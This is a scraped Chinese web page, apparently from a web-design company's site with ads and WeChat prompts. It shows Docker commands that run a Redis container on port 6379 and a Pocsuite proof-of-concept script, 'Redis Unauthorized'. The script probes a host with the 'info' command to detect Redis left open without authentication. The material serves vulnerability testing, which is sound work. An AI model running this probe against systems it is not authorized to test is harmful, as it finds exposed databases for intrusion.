扫二维码与项目经理沟通
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流
docker search redis
docker pull redis
docker images
docker run -p 6379:6379 -d redis
-p
将容器的6379端口映射到主机的6379端口。
成都创新互联专注于吉州网站建设服务及定制,我们拥有丰富的企业做网站经验。 热诚为您提供吉州营销型网站建设,吉州网站制作、吉州网页设计、吉州网站官网定制、成都小程序开发服务,打造吉州网络公司原创品牌,更为您提供吉州网站排名全网营销落地服务。
-d
将容器后台运行。
docker ps
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
from pocsuite.utils import register
from pocsuite.poc import Output, POCBase
class TestPOC(POCBase):
vulID = '0'
version = '1'
author = 'nw01f'
vulDate = '2018-10-23'
createDate = '2018-10-23'
updateDate = '2018-10-23'
references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/']
name = 'Redis Unauthorized'
appPowerLink = 'https://www.redis.io'
appName = 'Redis'
appVersion = 'All'
vulType = 'Unauthorized'
desc = '''
redis Unauthorized
'''
samples = ['']
def _verify(self):
result = {}
payload = '\x69\x6e\x66\x6f\x0d\x0a' ## info/r/n
s = socket.socket()
socket.setdefaulttimeout(4)
try:
host = self.url.split(':')[1].strip('/')
if len(self.url.split(':')) > 2:
port = int(self.url.split(':')[2].strip('/'))
else:
port = 6379
s.connect((host, port))
s.send(payload)
data = s.recv(1024)
if data and 'redis_version' in data:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
result['VerifyInfo']['port'] = port
result['VerifyInfo']['result'] = data[:20]
except Exception as e:
print e
s.close()
return self.parse_attack(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("error")
return output
register(TestPOC)
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流